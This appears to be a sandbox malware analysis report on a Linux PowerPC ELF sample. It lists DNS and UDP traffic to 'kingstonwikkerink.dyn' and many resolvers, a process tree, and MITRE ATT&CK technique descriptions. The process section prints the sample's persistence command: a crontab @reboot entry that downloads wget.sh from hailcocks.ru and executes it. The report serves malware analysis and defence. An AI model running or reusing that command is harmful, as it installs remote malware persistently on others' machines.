Nov 17, 2024 05:37:56.099666119 CET	32973	53	192.168.2.23	137.220.52.23
Nov 17, 2024 05:37:56.339787006 CET	51984	53	192.168.2.23	137.220.52.23
Nov 17, 2024 05:38:01.103455067 CET	45644	53	192.168.2.23	64.176.6.48
Nov 17, 2024 05:38:01.344283104 CET	55259	53	192.168.2.23	64.176.6.48
Nov 17, 2024 05:38:06.105657101 CET	56395	53	192.168.2.23	178.254.22.166
Nov 17, 2024 05:38:06.350018024 CET	52300	53	192.168.2.23	178.254.22.166
Nov 17, 2024 05:38:11.109148026 CET	51004	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:38:11.197032928 CET	53	51004	168.235.111.72	192.168.2.23
Nov 17, 2024 05:38:11.352998018 CET	39568	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:38:11.442398071 CET	53	39568	168.235.111.72	192.168.2.23
Nov 17, 2024 05:38:16.788114071 CET	51291	53	192.168.2.23	81.169.136.222
Nov 17, 2024 05:38:16.815871000 CET	53	51291	81.169.136.222	192.168.2.23
Nov 17, 2024 05:38:17.343801022 CET	51764	53	192.168.2.23	81.169.136.222
Nov 17, 2024 05:38:17.371542931 CET	53	51764	81.169.136.222	192.168.2.23
Nov 17, 2024 05:38:22.684416056 CET	36969	53	192.168.2.23	202.61.197.122
Nov 17, 2024 05:38:22.695282936 CET	53	36969	202.61.197.122	192.168.2.23
Nov 17, 2024 05:38:28.777559996 CET	53980	53	192.168.2.23	70.34.254.19
Nov 17, 2024 05:38:30.867204905 CET	51912	53	192.168.2.23	202.61.197.122
Nov 17, 2024 05:38:30.878082037 CET	53	51912	202.61.197.122	192.168.2.23
Nov 17, 2024 05:38:33.784451962 CET	51146	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:38:33.795098066 CET	53	51146	194.36.144.87	192.168.2.23
Nov 17, 2024 05:38:33.796652079 CET	44734	53	192.168.2.23	137.220.52.23
Nov 17, 2024 05:38:36.853727102 CET	38528	53	192.168.2.23	70.34.254.19
Nov 17, 2024 05:38:38.804609060 CET	59323	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:38:38.892720938 CET	53	59323	168.235.111.72	192.168.2.23
Nov 17, 2024 05:38:41.860110998 CET	57296	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:38:41.871232033 CET	53	57296	194.36.144.87	192.168.2.23
Nov 17, 2024 05:38:41.873537064 CET	33743	53	192.168.2.23	137.220.52.23
Nov 17, 2024 05:38:44.855079889 CET	50807	53	192.168.2.23	152.53.15.127
Nov 17, 2024 05:38:44.866327047 CET	53	50807	152.53.15.127	192.168.2.23
Nov 17, 2024 05:38:44.869710922 CET	46213	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:38:44.880588055 CET	53	46213	194.36.144.87	192.168.2.23
Nov 17, 2024 05:38:44.883495092 CET	50477	53	192.168.2.23	139.84.165.176
Nov 17, 2024 05:38:46.878884077 CET	55494	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:38:46.967449903 CET	53	55494	168.235.111.72	192.168.2.23
Nov 17, 2024 05:38:49.889156103 CET	55774	53	192.168.2.23	64.176.6.48
Nov 17, 2024 05:38:53.438951015 CET	39530	53	192.168.2.23	152.53.15.127
Nov 17, 2024 05:38:53.449443102 CET	53	39530	152.53.15.127	192.168.2.23
Nov 17, 2024 05:38:53.451036930 CET	46213	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:38:53.461437941 CET	53	46213	194.36.144.87	192.168.2.23
Nov 17, 2024 05:38:53.463221073 CET	33142	53	192.168.2.23	139.84.165.176
Nov 17, 2024 05:38:58.470781088 CET	43192	53	192.168.2.23	64.176.6.48
Nov 17, 2024 05:39:00.854245901 CET	47419	53	192.168.2.23	178.254.22.166
Nov 17, 2024 05:39:05.860722065 CET	41707	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:39:05.949034929 CET	53	41707	168.235.111.72	192.168.2.23
Nov 17, 2024 05:39:10.099689007 CET	51659	53	192.168.2.23	178.254.22.166
Nov 17, 2024 05:39:11.960540056 CET	39514	53	192.168.2.23	217.160.70.42
Nov 17, 2024 05:39:11.988686085 CET	53	39514	217.160.70.42	192.168.2.23
Nov 17, 2024 05:39:15.107866049 CET	53253	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:39:15.196177006 CET	53	53253	168.235.111.72	192.168.2.23
Nov 17, 2024 05:39:17.878464937 CET	52020	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:39:17.968534946 CET	53	52020	168.235.111.72	192.168.2.23
Nov 17, 2024 05:39:21.085335016 CET	58448	53	192.168.2.23	217.160.70.42
Nov 17, 2024 05:39:21.113085032 CET	53	58448	217.160.70.42	192.168.2.23
Nov 17, 2024 05:39:27.293713093 CET	34096	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:39:27.381669998 CET	53	34096	168.235.111.72	192.168.2.23
Nov 17, 2024 05:39:31.453370094 CET	35133	53	192.168.2.23	185.181.61.24
Nov 17, 2024 05:39:31.486896038 CET	53	35133	185.181.61.24	192.168.2.23
Nov 17, 2024 05:39:40.874448061 CET	58368	53	192.168.2.23	185.181.61.24
Nov 17, 2024 05:39:40.908368111 CET	53	58368	185.181.61.24	192.168.2.23
Nov 17, 2024 05:39:44.985913992 CET	46760	53	192.168.2.23	185.181.61.24
Nov 17, 2024 05:39:45.019700050 CET	53	46760	185.181.61.24	192.168.2.23
Nov 17, 2024 05:39:46.972815037 CET	51594	53	192.168.2.23	185.181.61.24
Nov 17, 2024 05:39:47.007016897 CET	53	51594	185.181.61.24	192.168.2.23
Nov 17, 2024 05:39:54.256990910 CET	39584	53	192.168.2.23	202.61.197.122
Nov 17, 2024 05:39:54.269651890 CET	53	39584	202.61.197.122	192.168.2.23
Nov 17, 2024 05:40:00.496047020 CET	43097	53	192.168.2.23	202.61.197.122
Nov 17, 2024 05:40:00.507353067 CET	53	43097	202.61.197.122	192.168.2.23
Nov 17, 2024 05:40:06.464157104 CET	45274	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:40:06.476317883 CET	53	45274	194.36.144.87	192.168.2.23
Nov 17, 2024 05:40:06.478609085 CET	56402	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:40:06.570729971 CET	53	56402	168.235.111.72	192.168.2.23
Nov 17, 2024 05:40:07.760801077 CET	55209	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:40:07.771814108 CET	53	55209	194.36.144.87	192.168.2.23
Nov 17, 2024 05:40:07.774061918 CET	44209	53	192.168.2.23	168.235.111.72
Nov 17, 2024 05:40:07.867214918 CET	53	44209	168.235.111.72	192.168.2.23
Nov 17, 2024 05:40:14.311610937 CET	44506	53	192.168.2.23	65.21.1.106
Nov 17, 2024 05:40:14.338500977 CET	53	44506	65.21.1.106	192.168.2.23
Nov 17, 2024 05:40:14.342267036 CET	53630	53	192.168.2.23	64.176.6.48
Nov 17, 2024 05:40:19.350760937 CET	51330	53	192.168.2.23	51.158.108.203
Nov 17, 2024 05:40:19.367209911 CET	53	51330	51.158.108.203	192.168.2.23
Nov 17, 2024 05:40:19.371225119 CET	40862	53	192.168.2.23	80.152.203.134
Nov 17, 2024 05:40:19.424640894 CET	53	40862	80.152.203.134	192.168.2.23
Nov 17, 2024 05:40:20.077440977 CET	37899	53	192.168.2.23	65.21.1.106
Nov 17, 2024 05:40:20.106304884 CET	53	37899	65.21.1.106	192.168.2.23
Nov 17, 2024 05:40:20.109710932 CET	60456	53	192.168.2.23	64.176.6.48
Nov 17, 2024 05:40:25.113949060 CET	43881	53	192.168.2.23	51.158.108.203
Nov 17, 2024 05:40:25.129915953 CET	53	43881	51.158.108.203	192.168.2.23
Nov 17, 2024 05:40:25.134181976 CET	50171	53	192.168.2.23	80.152.203.134
Nov 17, 2024 05:40:25.499787092 CET	53	50171	80.152.203.134	192.168.2.23
Nov 17, 2024 05:40:32.111623049 CET	43125	53	192.168.2.23	217.160.70.42
Nov 17, 2024 05:40:32.139122963 CET	53	43125	217.160.70.42	192.168.2.23
Nov 17, 2024 05:40:32.922411919 CET	35215	53	192.168.2.23	217.160.70.42
Nov 17, 2024 05:40:32.949969053 CET	53	35215	217.160.70.42	192.168.2.23
Nov 17, 2024 05:40:45.637001991 CET	48637	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:40:45.648392916 CET	53	48637	194.36.144.87	192.168.2.23
Nov 17, 2024 05:40:45.650096893 CET	52381	53	192.168.2.23	178.254.22.166
Nov 17, 2024 05:40:46.455530882 CET	44548	53	192.168.2.23	194.36.144.87
Nov 17, 2024 05:40:46.466434956 CET	53	44548	194.36.144.87	192.168.2.23
Nov 17, 2024 05:40:46.468935013 CET	57426	53	192.168.2.23	178.254.22.166
Nov 17, 2024 05:40:50.658421040 CET	58566	53	192.168.2.23	81.169.136.222
Nov 17, 2024 05:40:50.686872005 CET	53	58566	81.169.136.222	192.168.2.23
Nov 17, 2024 05:40:51.476824045 CET	44250	53	192.168.2.23	81.169.136.222
Nov 17, 2024 05:40:51.505321026 CET	53	44250	81.169.136.222	192.168.2.23
Nov 17, 2024 05:40:57.153965950 CET	59001	53	192.168.2.23	81.169.136.222
Nov 17, 2024 05:40:57.204858065 CET	53	59001	81.169.136.222	192.168.2.23
Nov 17, 2024 05:40:57.497087002 CET	34609	53	192.168.2.23	81.169.136.222
Nov 17, 2024 05:40:57.525485039 CET	53	34609	81.169.136.222	192.168.2.23
Nov 17, 2024 05:41:03.498655081 CET	43924	53	192.168.2.23	70.34.254.19
Nov 17, 2024 05:41:08.508306980 CET	60334	53	192.168.2.23	5.161.109.23
Nov 17, 2024 05:41:10.696543932 CET	38235	53	192.168.2.23	70.34.254.19
Nov 17, 2024 05:41:13.514655113 CET	35936	53	192.168.2.23	139.84.165.176
Nov 17, 2024 05:41:15.703195095 CET	60132	53	192.168.2.23	5.161.109.23
Nov 17, 2024 05:41:18.522726059 CET	54174	53	192.168.2.23	65.21.1.106
Nov 17, 2024 05:41:18.550760984 CET	53	54174	65.21.1.106	192.168.2.23
Nov 17, 2024 05:41:20.710402012 CET	43357	53	192.168.2.23	139.84.165.176
Nov 17, 2024 05:41:24.544348001 CET	45662	53	192.168.2.23	5.161.109.23
Nov 17, 2024 05:41:25.717056036 CET	43018	53	192.168.2.23	65.21.1.106
Nov 17, 2024 05:41:25.744293928 CET	53	43018	65.21.1.106	192.168.2.23
Nov 17, 2024 05:41:29.550312996 CET	44601	53	192.168.2.23	64.176.6.48

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 17, 2024 05:37:56.099666119 CET	192.168.2.23	137.220.52.23	0x6232	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:37:56.339787006 CET	192.168.2.23	137.220.52.23	0x6232	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:01.103455067 CET	192.168.2.23	64.176.6.48	0xf7b8	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:01.344283104 CET	192.168.2.23	64.176.6.48	0xf7b8	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:06.105657101 CET	192.168.2.23	178.254.22.166	0xfb63	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:06.350018024 CET	192.168.2.23	178.254.22.166	0xfb63	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:11.109148026 CET	192.168.2.23	168.235.111.72	0x3c26	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:11.352998018 CET	192.168.2.23	168.235.111.72	0x3c26	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:16.788114071 CET	192.168.2.23	81.169.136.222	0xabb1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:17.343801022 CET	192.168.2.23	81.169.136.222	0xabb1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:22.684416056 CET	192.168.2.23	202.61.197.122	0x3c7e	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:28.777559996 CET	192.168.2.23	70.34.254.19	0x5e91	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:30.867204905 CET	192.168.2.23	202.61.197.122	0x3c7e	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:33.784451962 CET	192.168.2.23	194.36.144.87	0x5816	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:33.796652079 CET	192.168.2.23	137.220.52.23	0x1c1b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:36.853727102 CET	192.168.2.23	70.34.254.19	0x5e91	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:38.804609060 CET	192.168.2.23	168.235.111.72	0x191c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:41.860110998 CET	192.168.2.23	194.36.144.87	0x5816	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:41.873537064 CET	192.168.2.23	137.220.52.23	0x1c1b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:44.855079889 CET	192.168.2.23	152.53.15.127	0x103f	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:44.869710922 CET	192.168.2.23	194.36.144.87	0xe5ab	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:44.883495092 CET	192.168.2.23	139.84.165.176	0x2fb9	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:46.878884077 CET	192.168.2.23	168.235.111.72	0x191c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:49.889156103 CET	192.168.2.23	64.176.6.48	0x17ad	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:53.438951015 CET	192.168.2.23	152.53.15.127	0x103f	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:53.451036930 CET	192.168.2.23	194.36.144.87	0xe5ab	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:53.463221073 CET	192.168.2.23	139.84.165.176	0x2fb9	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:38:58.470781088 CET	192.168.2.23	64.176.6.48	0x17ad	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:00.854245901 CET	192.168.2.23	178.254.22.166	0xe711	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:05.860722065 CET	192.168.2.23	168.235.111.72	0xa222	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:10.099689007 CET	192.168.2.23	178.254.22.166	0xe711	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:11.960540056 CET	192.168.2.23	217.160.70.42	0x3fab	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:15.107866049 CET	192.168.2.23	168.235.111.72	0xa222	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:17.878464937 CET	192.168.2.23	168.235.111.72	0x9b2a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:21.085335016 CET	192.168.2.23	217.160.70.42	0x3fab	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:27.293713093 CET	192.168.2.23	168.235.111.72	0x9b2a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:31.453370094 CET	192.168.2.23	185.181.61.24	0x1595	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:40.874448061 CET	192.168.2.23	185.181.61.24	0x1595	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:44.985913992 CET	192.168.2.23	185.181.61.24	0x3572	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:46.972815037 CET	192.168.2.23	185.181.61.24	0x3572	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:39:54.256990910 CET	192.168.2.23	202.61.197.122	0xaf7	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:00.496047020 CET	192.168.2.23	202.61.197.122	0xaf7	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:06.464157104 CET	192.168.2.23	194.36.144.87	0x3ca2	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:06.478609085 CET	192.168.2.23	168.235.111.72	0xebd3	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:07.760801077 CET	192.168.2.23	194.36.144.87	0x3ca2	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:07.774061918 CET	192.168.2.23	168.235.111.72	0xebd3	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:14.311610937 CET	192.168.2.23	65.21.1.106	0x91a1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:14.342267036 CET	192.168.2.23	64.176.6.48	0x22d7	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:19.350760937 CET	192.168.2.23	51.158.108.203	0x9072	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:19.371225119 CET	192.168.2.23	80.152.203.134	0x2c18	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:20.077440977 CET	192.168.2.23	65.21.1.106	0x91a1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:20.109710932 CET	192.168.2.23	64.176.6.48	0x22d7	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:25.113949060 CET	192.168.2.23	51.158.108.203	0x9072	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:25.134181976 CET	192.168.2.23	80.152.203.134	0x2c18	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:32.111623049 CET	192.168.2.23	217.160.70.42	0xeae	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:32.922411919 CET	192.168.2.23	217.160.70.42	0xeae	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:45.637001991 CET	192.168.2.23	194.36.144.87	0xe8bf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:45.650096893 CET	192.168.2.23	178.254.22.166	0x62da	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:46.455530882 CET	192.168.2.23	194.36.144.87	0xe8bf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:46.468935013 CET	192.168.2.23	178.254.22.166	0x62da	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:50.658421040 CET	192.168.2.23	81.169.136.222	0x4fe	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:51.476824045 CET	192.168.2.23	81.169.136.222	0x4fe	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:57.153965950 CET	192.168.2.23	81.169.136.222	0x7bb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:40:57.497087002 CET	192.168.2.23	81.169.136.222	0x7bb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:03.498655081 CET	192.168.2.23	70.34.254.19	0x6570	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:08.508306980 CET	192.168.2.23	5.161.109.23	0x1ba6	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:10.696543932 CET	192.168.2.23	70.34.254.19	0x6570	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:13.514655113 CET	192.168.2.23	139.84.165.176	0x3922	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:15.703195095 CET	192.168.2.23	5.161.109.23	0x1ba6	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:18.522726059 CET	192.168.2.23	65.21.1.106	0xc8d8	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:20.710402012 CET	192.168.2.23	139.84.165.176	0x3922	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:24.544348001 CET	192.168.2.23	5.161.109.23	0x2079	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:25.717056036 CET	192.168.2.23	65.21.1.106	0xc8d8	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 05:41:29.550312996 CET	192.168.2.23	64.176.6.48	0x7bdf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: ppc.elf PID: 6232, Parent PID: 6156

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	/tmp/ppc.elf
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Chronological Activities

Analysis Process: ppc.elf PID: 6234, Parent PID: 6232

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Chronological Activities

Analysis Process: sh PID: 6234, Parent PID: 6232

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6240, Parent PID: 6234

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6242, Parent PID: 6240

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6242, Parent PID: 6240

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 6241, Parent PID: 6234

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6241, Parent PID: 6234

General

Start time (UTC):	04:37:54
Start date (UTC):	17/11/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: ppc.elf PID: 6243, Parent PID: 6232

General

Start time (UTC):	04:37:55
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Chronological Activities

Analysis Process: ppc.elf PID: 6294, Parent PID: 6243

General

Start time (UTC):	04:37:55
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Chronological Activities

Analysis Process: ppc.elf PID: 6298, Parent PID: 6243

General

Start time (UTC):	04:37:55
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Chronological Activities

Analysis Process: ppc.elf PID: 6245, Parent PID: 6232

General

Start time (UTC):	04:37:55
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Chronological Activities

Analysis Process: ppc.elf PID: 6255, Parent PID: 6232

General

Start time (UTC):	04:37:55
Start date (UTC):	17/11/2024
Path:	/tmp/ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

